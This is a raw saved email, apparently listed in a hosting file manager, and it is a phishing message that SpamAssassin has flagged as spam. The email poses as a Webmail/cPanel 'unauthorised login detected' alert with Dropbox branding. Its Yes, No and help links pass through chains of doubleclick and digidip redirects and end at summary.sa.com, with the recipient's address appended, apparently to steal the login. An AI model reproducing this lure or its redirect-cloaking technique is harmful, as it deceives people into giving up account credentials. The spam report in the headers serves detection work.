OwlCyberSecurity - MANAGER

Edit File: 1745518919.M471031P2960436.premium128.web-hosting.com,S=17020,W=17283:2,

Return-Path: <info@server2096.cc> Delivered-To: nassim.sahi+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id qGWIBUeBCmg0LC0AAvhI2g (envelope-from <info@server2096.cc>) for <nassim.sahi+spam@gourayafroid.com>; Thu, 24 Apr 2025 14:21:59 -0400 Return-path: <info@server2096.cc> Envelope-to: nassim.sahi@gourayafroid.com Delivery-date: Thu, 24 Apr 2025 14:21:59 -0400 Received: from [198.23.221.49] (port=33028 helo=server2096.cc) by premium128.web-hosting.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.98.1) (envelope-from <info@server2096.cc>) id 1u81Cp-0000000CR1P-3J3a for nassim.sahi@gourayafroid.com; Thu, 24 Apr 2025 14:21:58 -0400 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=re1; d=server2096.cc; h=From:To:Subject:Date:Message-ID:MIME-Version:Content-Type: Content-Transfer-Encoding; i=info@server2096.cc; bh=SGhdP2g2KATfx1UunqwdR8BRRWqatZJdZBNDB1UB7tA=; b=sYZ0v27mFMICkKPPQgtvJIND9QnBT/Y4JjpiaZQ0UIedzF5p97XiVdaSVB2LmW07HMJ+W/fUg/tk RnMWjAmF56XOiqbHFrAKi1R6ZFqe/t0uQPatwCw+GQMSy0EP5eEaRA/eETybNfkLNP7p05wlS4Pl UsBnOGhYDkXkQ/IFXYqNsprxyBMWr73JQLLsZ/aKJO7TKbeJPbaho1NkE7H5N+VcvF6uWcPJ9rO5 jblM7xGR03HYMcjdtzUXSiP6l4xsCBndxw/wDnaosKCvylTfhxUakVoHXm4VD1rmb2sfnOZNGI7i qcbfHGe4wtOvQ2emCoGE0/KkW9Jbrtg2JoA3DQ== From: "Security Risk" <info@server2096.cc> To: nassim.sahi@gourayafroid.com Date: 23 Apr 2025 10:29:26 +0200 Message-ID: <20250423102926.A41244F2689F7D08@server2096.cc> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-Spam-Status: Yes, score=11.0 X-Spam-Score: 110 X-Spam-Bar: +++++++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Hi nassim.sahi, A new computer just signed in to your nassim.sahi@gourayafroid.com account. To help keep your account secure, let us know if this is you. Content analysis details: (11.0 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URI: digidip.net] [URI: summary.sa.com] [URI: doubleclick.net] [URI: dropboxstatic.com] [URI: server2096.cc] 0.5 PCCC_BAD_FREE_URI Body contains URI listed in PCCC WILD RBL (https://raptor.pccc.com/RBL) [URI: summary.sa.com] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [198.23.221.49 listed in bl.score.senderscore.com] 2.5 URIBL_DBL_PHISH Contains a Phishing URL listed in the Spamhaus DBL blocklist [URI: server2096.cc] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [198.23.221.49 listed in sa-trusted.bondedsender.org] 0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [198.23.221.49 listed in sa-accredit.habeas.com] 0.1 URIBL_CSS_A Contains URL's A record listed in the Spamhaus CSS blocklist [URI: server2096.cc/198.23.221.49] -0.0 SPF_PASS SPF: sender matches SPF record -0.0 SPF_HELO_PASS SPF: HELO matches SPF record -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from envelope-from domain -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.5 DATE_IN_PAST_24_48 Date: is 24 to 48 hours before Received: date 2.0 KAM_2TLD_PROBLEMS URI: Problematic 2TLD handlers being abused 0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_MESSAGE BODY: HTML included in message 0.5 KAM_REALLYHUGEIMGSRC RAW: Spam with image tags with ridiculously huge http urls 2.0 RDNS_NONE Delivered to internal network by a host with no rDNS 3.0 KAM_SA_ZA_ABUSE 2TLD Providers prevalent in spam abuse X-Spam-Flag: YES Subject: ***SPAM*** Unauthorised Login Detected nassim.sahi@gourayafroid.com <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em; font-size: 14pt;"> <div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p= x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-= size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white= -space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, 255)= ; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s= troke-width: 0px; text-decoration-thickness: initial; text-decoration-style= : initial; text-decoration-color: initial;"><u></u> <div style=3D"margin: 0px; padding: 0px; width: 1292px;" marginheight=3D"0"= marginwidth=3D"0"> <table align=3D"center" style=3D"border-radius: 4px; border: 1px solid rgb(= 220, 234, 245); border-image: none; color: rgb(34, 34, 34); text-transform:= none; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; f= ont-size: small; font-style: normal; font-weight: 400; word-spacing: 0px; w= hite-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, = 255); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-te= xt-stroke-width: 0px; text-decoration-thickness:=20 initial; text-decoration-style: initial; text-decoration-color: initial;" b= order=3D"0" cellspacing=3D"0" cellpadding=3D"0"><tbody><tr style=3D"line-he= ight: 0px;"><td width=3D"100%" height=3D"1" align=3D"center" style=3D"margi= n: 0px; font-size: 0px;"> <img width=3D"40" class=3D"CToWUd" style=3D"width: 40px; max-height: 73px;"= alt=3D"" src=3D"https://ci3.googleusercontent.com/meips/ADKq_NaNfuLA6keZr-= e5JWp6ac_j2CRP4nCpBpnhKprpxCR3KkZTTH304ae4DSQXWJizOdfRz5dhBiozF-pQa-H0sUSVM= S6IJTAEulPBxe4X5hTQaLIE75j2fm_EDotRvdFMCZnPtwjHlg0t4aOqQsFn8pplxB4N=3Ds0-d-= e1-ft#https://cfl.dropboxstatic.com/static/metaserver/static/images/emails/= logo_glyph_34_m1%402x.png" data-bit=3D"iit" height=3D"73"></td></tr><tr><td= style=3D"margin: 0px;"> <table align=3D"center" style=3D"line-height: 25px;" border=3D"0" cellspaci= ng=3D"0" cellpadding=3D"0"><tbody><tr><td height=3D"30" style=3D"margin: 0p= x;" colspan=3D"3"></td></tr><tr><td width=3D"36" style=3D"margin: 0px;"></t= d><td width=3D"454" align=3D"left" valign=3D"top" style=3D'margin: 0px; col= or: rgb(68, 68, 68); font-family: proxima_nova, "Open Sans", "Lucida Grande= ", "Segoe UI", Arial, Verdana, "Lucida Sans Unicode", Tahoma, "Sans Serif";= font-size: 11pt; border-collapse: collapse; max-width: 454px;'> Hi nassim.sahi,<br> <br>A new computer just signed in to your&nbsp;nassim.sahi@gourayafroid.com= account. To help keep your account secure, let us know if this is you.<br>= <br><table style=3D"background: rgb(232, 242, 250); border-radius: 4px; wid= th: 454px;"><tbody><tr><td height=3D"16" style=3D"margin: 0px;"></td><td he= ight=3D"16" style=3D"margin: 0px;"></td><td height=3D"16" style=3D"margin: = 0px;"></td></tr><tr><td width=3D"20" style=3D"margin: 0px;"></td><td style= =3D"margin: 0px;"><span style=3D"text-align: center; color: rgb(68, 68, 68)= ;"><b> Is this you?</b> </span><table align=3D"center" style=3D"color: rgb(68, 68, 68); font-size: = 14px;" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"><tbody><tr><td heig= ht=3D"10" style=3D"margin: 0px;"></td><td height=3D"10" style=3D"margin: 0p= x;"></td></tr><tr valign=3D"top"><td width=3D"90" style=3D"margin: 0px;">Wh= ere:</td><td style=3D"margin: 0px;"><b>an unknown location</b></td></tr><tr= valign=3D"top"><td width=3D"90" style=3D"margin: 0px;">When:</td><td style= =3D"margin: 0px;"><b>4/23/2025 10:29:26 a.m.</b></td></tr> <tr valign=3D"top"><td width=3D"90" style=3D"margin: 0px;">What:</td><td st= yle=3D"margin: 0px;"><b>Desktop Client on Windows 11 26100</b></td></tr><tr= ><td height=3D"16" style=3D"margin: 0px;"></td><td height=3D"16" style=3D"m= argin: 0px;"></td></tr></tbody></table><table align=3D"center" style=3D"tex= t-align: center;" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"><tbody><= tr><td width=3D"124" style=3D"margin: 0px;"> <a style=3D'border-width: 1px; border-style: solid; border-color: rgb(191, = 191, 191) rgb(177, 177, 177) rgb(170, 170, 170); margin: 0px; padding: 7px;= border-radius: 3px; width: 97px; text-align: center; color: rgb(119, 119, = 119); font-family: proxima_nova, "Open Sans", "lucida grande", "Segoe UI", = arial, verdana, "lucida sans unicode", tahoma, sans-serif; font-size: 14px;= text-decoration: none; display: block; max-width: 97px; background-color: = rgb(243, 243, 243);'=20 href=3D"https://googleads.g.doubleclick.net/pcs/click?xai=3DAKAOjssIdZGtK2L= Gw4coQMwtQcONuf8cVZUVHUrlFgT33_wiLCuxpoweUvHdBH9neY4iW-CZh2SzgITptx6j64F0B2= pEU0uoeRfmKTeyn7LSG5Irubqjv6IFl9MeqTp84ZT99WRJlZDMgrwUaUI7QjgNwL22AVveJm980= wuVNryiILT2WhxCPmcY8M7PVIOygAXT_382p7PUn7bIByn2OjlTfCiaqta3tAhZWCuROeXZPznm= 5cGhgUYspVywPb8Y8GbuT5pyEUyF89icmqe5zg&sig=3DCg0ArKJSzFtr0kI2Y6Ll&adurl=3Dh= ttps://knoji.digidip.net/visit?url=3Dhttps://anti-crise.digidip.net/visit?u= rl=3Dhttps://summary.sa.com#nassim.sahi@gourayafroid.com " target=3D"_blank= " data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://www.dropbo= x.com/l/AACC_APInJT7ZFAivKJRGksUFfyT7bC2H0c&amp;source=3Dgmail&amp;ust=3D17= 45411698442000&amp;usg=3DAOvVaw1LOH15S6TpsU_2DLrwmz9A">Yes</a></td><td styl= e=3D"margin: 0px;"></td><td width=3D"124" height=3D"0px" style=3D"margin: 0= px;"> <a style=3D'border-width: 1px; border-style: solid; border-color: rgb(191, = 191, 191) rgb(177, 177, 177) rgb(170, 170, 170); margin: 0px; padding: 7px;= border-radius: 3px; width: 97px; text-align: center; color: rgb(119, 119, = 119); font-family: proxima_nova, "Open Sans", "lucida grande", "Segoe UI", = arial, verdana, "lucida sans unicode", tahoma, sans-serif; font-size: 14px;= text-decoration: none; display: block; max-width: 97px; background-color: = rgb(243, 243, 243);'=20 href=3D"https://googleads.g.doubleclick.net/pcs/click?xai=3DAKAOjssIdZGtK2L= Gw4coQMwtQcONuf8cVZUVHUrlFgT33_wiLCuxpoweUvHdBH9neY4iW-CZh2SzgITptx6j64F0B2= pEU0uoeRfmKTeyn7LSG5Irubqjv6IFl9MeqTp84ZT99WRJlZDMgrwUaUI7QjgNwL22AVveJm980= wuVNryiILT2WhxCPmcY8M7PVIOygAXT_382p7PUn7bIByn2OjlTfCiaqta3tAhZWCuROeXZPznm= 5cGhgUYspVywPb8Y8GbuT5pyEUyF89icmqe5zg&sig=3DCg0ArKJSzFtr0kI2Y6Ll&adurl=3Dh= ttps://knoji.digidip.net/visit?url=3Dhttps://anti-crise.digidip.net/visit?u= rl=3Dhttps://summary.sa.com#nassim.sahi@gourayafroid.com " target=3D"_blank= " data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://www.dropbo= x.com/l/AADhrpgNRcgae0kNHVVk-R75jtaXm8v-yCs&amp;source=3Dgmail&amp;ust=3D17= 45411698442000&amp;usg=3DAOvVaw2xBrBjciibxAnd1gG5vRNG">No</a></td></tr></tb= ody></table><table align=3D"left" style=3D"text-align: left;" border=3D"0" = cellspacing=3D"0" cellpadding=3D"0"><tbody><tr align=3D"left"><td width=3D"= 97" height=3D"0px" style=3D"margin: 0px;"><br></td> <td width=3D"0px" height=3D"0px" style=3D"margin: 0px;"><br></td></tr></tbo= dy></table><br><a style=3D"color: rgb(17, 85, 204);" href=3D"https://google= ads.g.doubleclick.net/pcs/click?xai=3DAKAOjssIdZGtK2LGw4coQMwtQcONuf8cVZUVH= UrlFgT33_wiLCuxpoweUvHdBH9neY4iW-CZh2SzgITptx6j64F0B2pEU0uoeRfmKTeyn7LSG5Ir= ubqjv6IFl9MeqTp84ZT99WRJlZDMgrwUaUI7QjgNwL22AVveJm980wuVNryiILT2WhxCPmcY8M7= PVIOygAXT_382p7PUn7bIByn2OjlTfCiaqta3tAhZWCuROeXZPznm5cGhgUYspVywPb8Y8GbuT5= pyEUyF89icmqe5zg&sig=3DCg0ArKJSzFtr0kI2Y6Ll&adurl=3Dhttps://knoji.digidip.n= et/visit?url=3Dhttps://anti-crise.digidip.net/visit?url=3Dhttps://summary.s= a.com#nassim.sahi@gourayafroid.com " target=3D"_blank" data-saferedirecturl= =3D"https://www.google.com/url?q=3Dhttps://www.dropbox.com/l/AACbD3TdSJn-d0= 9OK0ga0eV-0UO_gcwKTBY&amp;source=3Dgmail&amp;ust=3D1745411698442000&amp;usg= =3DAOvVaw0xpMXqAliXIOZ1ihFKvqLO">I'm not sure</a><br></td><td width=3D"20" = style=3D"margin: 0px;"></td></tr><tr> <td height=3D"20" style=3D"margin: 0px;"></td><td height=3D"20" style=3D"ma= rgin: 0px;"></td><td height=3D"20" style=3D"margin: 0px;"></td></tr></tbody= ></table><br>Learn more on how to<span>&nbsp;</span> <a style=3D"color: rgb(17, 85, 204);" href=3D"https://googleads.g.doublecli= ck.net/pcs/click?xai=3DAKAOjssIdZGtK2LGw4coQMwtQcONuf8cVZUVHUrlFgT33_wiLCux= poweUvHdBH9neY4iW-CZh2SzgITptx6j64F0B2pEU0uoeRfmKTeyn7LSG5Irubqjv6IFl9MeqTp= 84ZT99WRJlZDMgrwUaUI7QjgNwL22AVveJm980wuVNryiILT2WhxCPmcY8M7PVIOygAXT_382p7= PUn7bIByn2OjlTfCiaqta3tAhZWCuROeXZPznm5cGhgUYspVywPb8Y8GbuT5pyEUyF89icmqe5z= g&sig=3DCg0ArKJSzFtr0kI2Y6Ll&adurl=3Dhttps://knoji.digidip.net/visit?url=3D= https://anti-crise.digidip.net/visit?url=3Dhttps://summary.sa.com#nassim.sa= hi@gourayafroid.com " target=3D"_blank" data-saferedirecturl=3D"https://www= =2Egoogle.com/url?q=3Dhttps://www.dropbox.com/l/AACBsZ-QXKG1gPq9T2dGKJDLhtL= RNKglBgM/help/1973&amp;source=3Dgmail&amp;ust=3D1745411698442000&amp;usg=3D= AOvVaw329LNsyqw2spzeSpq6_SBw">protect your account</a>.<br><br>Thanks,<br>-= The&nbsp;Webmail Team<br></td><td width=3D"36" style=3D"margin: 0px;"></td= ></tr><tr> <td height=3D"36" style=3D"margin: 0px;" colspan=3D"3"></td></tr></tbody></= table></td></tr></tbody></table> <table align=3D"center" style=3D"color: rgb(34, 34, 34); text-transform: no= ne; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font= -size: small; font-style: normal; font-weight: 400; word-spacing: 0px; whit= e-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, 255= ); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-= stroke-width: 0px; text-decoration-thickness: initial; text-decoration-styl= e: initial; text-decoration-color: initial;"=20 border=3D"0" cellspacing=3D"0" cellpadding=3D"0"><tbody><tr><td height=3D"1= 0" style=3D"margin: 0px;"></td></tr><tr><td style=3D"margin: 0px; padding: = 0px; border-collapse: collapse;"><table align=3D"center" border=3D"0" cells= pacing=3D"0" cellpadding=3D"0"><tbody><tr style=3D'color: rgb(168, 185, 198= ); font-family: proxima_nova, "Open Sans", "Lucida Grande", "Segoe UI", Ari= al, Verdana, "Lucida Sans Unicode", Tahoma, "Sans Serif"; font-size: 11px;'= ><td width=3D"400" align=3D"left" style=3D"margin: 0px;"></td> <td width=3D"128" align=3D"right" style=3D"margin: 0px;">&copy; 2025 Cpanel= </td></tr></tbody></table></td></tr></tbody></table></div></div><p> <br style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0px= ; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-s= ize: small; font-style: normal; font-weight: 400; word-spacing: 0px; white-= space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, 255);= font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-st= roke-width: 0px; text-decoration-thickness: initial; text-decoration-style:= initial; text-decoration-color: initial;"></p> <div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p= x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-= size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white= -space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, 255)= ; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-s= troke-width: 0px; text-decoration-thickness: initial; text-decoration-style= : initial; text-decoration-color: initial;"><br> </div></body></html>